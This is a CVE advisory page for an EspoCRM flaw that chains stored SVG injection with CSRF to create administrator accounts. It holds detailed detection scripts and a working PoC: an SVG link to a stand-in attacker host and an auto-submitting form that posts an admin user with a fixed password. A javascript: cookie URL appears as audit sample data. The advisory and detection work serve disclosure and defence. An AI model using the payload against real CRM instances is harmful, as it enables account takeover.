Security Vulnerability Report
CVE-2025-59428 CVSS 5.4 MEDIUM

CVE-2025-59428

Published: 2025-10-14 15:16:12
Last Modified: 2025-10-20 18:12:30

Description

EspoCRM is an open source customer relationship management application. In versions before 9.1.9, a vulnerability allows arbitrary user creation, including administrative accounts, through a combination of stored SVG injection and lack of CSRF protection. An attacker with Knowledge Base edit permissions can embed a malicious SVG element containing a link in the body field of an article. When an authenticated user clicks the malicious link, they are redirected to an attacker-controlled HTML page that executes a CSRF request against the api/v1/User endpoint. If the victim is prompted for and enters their credentials, an attacker-controlled account is created with privileges determined by the CSRF payload. This issue has been patched in version 9.1.9.
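The stored half of the chain is a link nested inside an `<svg>` element in article HTML. The following content audit walks existing Knowledge Base bodies for exactly that shape and classifies each link it finds. It is an added example, not EspoCRM code or the advisory's PoC; the sample article bodies and the trusted host name crm.example.com are constructed for illustration. Upgrading to 9.1.9 does not by itself tell you whether a payload was already planted, which is what this check answers:

```python
"""Content audit for the CVE-2025-59428 injection primitive: an <a> (or any
href-bearing element) nested inside an <svg> in stored HTML such as a
Knowledge Base article body. Added example, not EspoCRM code; the sample
articles and the trusted host name are constructed for illustration."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# URL schemes that execute script or smuggle a document when followed.
SCRIPT_SCHEMES = {"javascript", "data", "vbscript"}


class SvgLinkAuditor(HTMLParser):
    """Collect clickable links that sit inside <svg>; ignore ordinary HTML links."""

    def __init__(self, trusted_hosts):
        super().__init__(convert_charrefs=True)
        self.trusted_hosts = {h.lower() for h in trusted_hosts}
        self.svg_depth = 0          # >0 while inside one or more <svg> elements
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag and attribute names for us.
        if tag == "svg":
            self.svg_depth += 1
            return
        if self.svg_depth == 0:
            return  # a plain HTML link is expected article content
        attr_map = {name: (value or "") for name, value in attrs}
        href = attr_map.get("href", attr_map.get("xlink:href"))
        if tag != "a" and href is None:
            return  # <rect>, <text>, ... without a link are harmless here
        self.findings.append({"tag": tag, "href": href, "reason": self._classify(href)})

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1

    def _classify(self, href):
        if href is None:
            return "anchor-without-href"
        parts = urlparse(href.strip())
        if parts.scheme.lower() in SCRIPT_SCHEMES:
            return "script-scheme"
        host = (parts.hostname or "").lower()
        if host and host not in self.trusted_hosts:
            return "external-link"      # the redirect primitive from the advisory
        return "internal-link"


def audit_article(body, trusted_hosts):
    """Return a list of findings for one article body (empty when clean)."""
    auditor = SvgLinkAuditor(trusted_hosts)
    auditor.feed(body)
    auditor.close()
    return auditor.findings


def audit_articles(articles, trusted_hosts):
    """Map article id -> findings for every article that has at least one hit."""
    report = {}
    for article in articles:
        hits = audit_article(article.get("body") or "", trusted_hosts)
        if hits:
            report[article["id"]] = hits
    return report


# Constructed sample bodies: one clean article, an advisory-style payload, and a script URL.
SAMPLE_ARTICLES = [
    {"id": "kb-clean",
     "body": '<p>Reset steps</p><svg width="10" height="10"><rect width="10" height="10"/></svg>'
             '<a href="https://docs.example.com/reset">docs</a>'},
    {"id": "kb-poc",
     "body": '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
             '<a href="https://attacker-controlled-server.com/exploit.html" target="_blank">'
             '<rect width="100" height="100" fill="blue"/>'
             '<text x="10" y="50" fill="white">Click here for important update</text></a></svg>'},
    {"id": "kb-script",
     "body": '<svg><a xlink:href="javascript:alert(document.cookie)"><text>hi</text></a></svg>'},
]

if __name__ == "__main__":
    for article_id, hits in audit_articles(SAMPLE_ARTICLES, ["crm.example.com"]).items():
        for hit in hits:
            print(f"{article_id}: <{hit['tag']}> {hit['reason']} {hit['href']}")
```

This is a triage heuristic, not a sanitizer: it will not see a `javascript:` URL that is obfuscated with embedded whitespace or entities the way a browser would, so treat anything it flags as a lead to inspect and anything it misses as not proven clean. Feed it the article bodies exported from the database rather than the rendered pages, since rendering may already have transformed the markup.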

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:* - VULNERABLE
EspoCRM < 9.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-59428 PoC: EspoCRM Stored SVG Injection + CSRF -->

<!-- Step 1: Malicious SVG embedded in Knowledge Base article body field -->
<!-- Attacker with Knowledge Base edit permission posts the following content -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <a href="https://attacker-controlled-server.com/exploit.html" target="_blank">
    <rect width="100" height="100" fill="blue"/>
    <text x="10" y="50" fill="white">Click here for important update</text>
  </a>
</svg>

<!-- Step 2: Hosted on attacker server (https://attacker-controlled-server.com/exploit.html) -->
<!-- This page auto-submits a CSRF request to create an admin user -->
<!DOCTYPE html>
<html>
<head><title>Important Update</title></head>
<body>
  <form id="csrfForm" method="POST" action="https://victim-espocrm.com/api/v1/User">
    <input type="hidden" name="userName" value="admin_support" />
    <input type="hidden" name="password" value="P@ssw0rd!2025" />
    <input type="hidden" name="firstName" value="Support" />
    <input type="hidden" name="lastName" value="Admin" />
    <input type="hidden" name="title" value="System Administrator" />
    <input type="hidden" name="isAdmin" value="true" />
    <input type="hidden" name="type" value="admin" />
  </form>
  <script>
    // Auto-submit the form to create admin account via CSRF
    document.getElementById('csrfForm').submit();
  </script>
</body>
</html>

<!-- Note: EspoCRM's api/v1/User endpoint lacks CSRF token validation, -->
<!-- allowing the browser to send authenticated session cookies automatically. -->
<!-- If the victim is an authenticated admin, an attacker-controlled admin account is created. -->
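To look for the CSRF leg after the fact, the following added example (not part of the page's PoC and not EspoCRM code) scans web-server access logs in the Apache/nginx "combined" format, which records the Referer, for POST requests to api/v1/User whose Referer is not the CRM's own host. It also pairs a 401 with a following 2xx from the same client, on the assumption that the credential prompt mentioned in the description surfaces as the browser's HTTP Basic dialog after a 401 challenge. The log lines, the CRM host crm.example.com and the five-minute pairing window are constructed assumptions:

```python
"""Retro-hunt over web-server access logs for the CSRF leg of CVE-2025-59428:
a cross-site POST to the EspoCRM api/v1/User endpoint, optionally preceded by
a 401 challenge that would have prompted the victim for credentials.
Added example, not EspoCRM code. Assumes the "combined" log format (which
records the Referer); the hostnames, window and log lines are constructed."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
USER_ENDPOINT = re.compile(r"^/api/v1/User(?:[/?]|$)")  # collection, sub-path or query string
CHALLENGE_WINDOW = timedelta(minutes=5)  # assumed gap between the 401 prompt and the retry


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_csrf_user_creation(lines, trusted_hosts):
    """Return one alert per POST to api/v1/User that did not come from the CRM's own UI."""
    trusted = {h.lower() for h in trusted_hosts}
    last_challenge = {}   # client ip -> time of its last 401 on the endpoint
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not USER_ENDPOINT.match(rec["path"]):
            continue
        referer = rec["referer"]
        ref_host = "" if referer == "-" else (urlparse(referer).hostname or "").lower()
        if ref_host in trusted:
            continue  # the CRM's own UI posting to its own API
        status = rec["status"]
        if status == "401":
            last_challenge[rec["ip"]] = rec["ts"]
            outcome = "auth-challenge"
        elif status.startswith("2"):
            outcome = "created"
        else:
            outcome = "rejected"
        prev = last_challenge.get(rec["ip"])
        prompted = outcome == "created" and prev is not None and rec["ts"] - prev <= CHALLENGE_WINDOW
        alerts.append({
            "ip": rec["ip"],
            "ts": rec["ts"].isoformat(),
            "verdict": "cross-site-referer" if ref_host else "no-referer",
            "referer_host": ref_host,
            "outcome": outcome,
            "prompted_then_created": prompted,
        })
    return alerts


# Constructed sample log: 203.0.113.7 follows the advisory's flow end to end,
# 198.51.100.4 is normal UI traffic, 192.0.2.10 is a referer-less client that was refused.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Oct/2025:15:20:01 +0000] "POST /api/v1/User HTTP/1.1" 401 0 '
    '"https://attacker-controlled-server.com/exploit.html" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Oct/2025:15:20:09 +0000] "POST /api/v1/User HTTP/1.1" 200 512 '
    '"https://attacker-controlled-server.com/exploit.html" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Oct/2025:15:21:30 +0000] "POST /api/v1/User HTTP/1.1" 200 512 '
    '"https://crm.example.com/" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Oct/2025:15:22:00 +0000] "GET /api/v1/User?maxSize=20 HTTP/1.1" 200 2048 '
    '"https://crm.example.com/" "Mozilla/5.0"',
    '192.0.2.10 - - [14/Oct/2025:15:30:00 +0000] "POST /api/v1/User HTTP/1.1" 403 0 '
    '"-" "python-requests/2.32.0"',
]

if __name__ == "__main__":
    for alert in detect_csrf_user_creation(SAMPLE_LOG, ["crm.example.com"]):
        print(alert)
```

Keep the "no-referer" bucket even though it is noisy (API integrations usually send no Referer): an attacker page can suppress the Referer with a referrer policy, so a referer-less 2xx POST that follows a 401 from the same client is still worth a look. If your proxy logs the Origin header, match on that instead of Referer, since it is not suppressed by referrer policy.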

References

https://github.com/espocrm/espocrm/security/advisories/GHSA-c26c-wvhr-fr6r (Vendor Advisory; tagged Exploit, Mitigation)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59428", "sourceIdentifier": "[email protected]", "published": "2025-10-14T15:16:11.673", "lastModified": "2025-10-20T18:12:29.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EspoCRM is an open source customer relationship management application. In versions before 9.1.9, a vulnerability allows arbitrary user creation, including administrative accounts, through a combination of stored SVG injection and lack of CSRF protection. An attacker with Knowledge Base edit permissions can embed a malicious SVG element containing a link in the body field of an article. When an authenticated user clicks the malicious link, they are redirected to an attacker-controlled HTML page that executes a CSRF request against the api/v1/User endpoint. If the victim is prompted for and enters their credentials, an attacker-controlled account is created with privileges determined by the CSRF payload. This issue has been patched in version 9.1.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:espocrm:espocrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.9", "matchCriteriaId": "8F85634C-E414-4BFA-9A30-987F87598B01"}]}]}], "references": 
[{"url": "https://github.com/espocrm/espocrm/security/advisories/GHSA-c26c-wvhr-fr6r", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}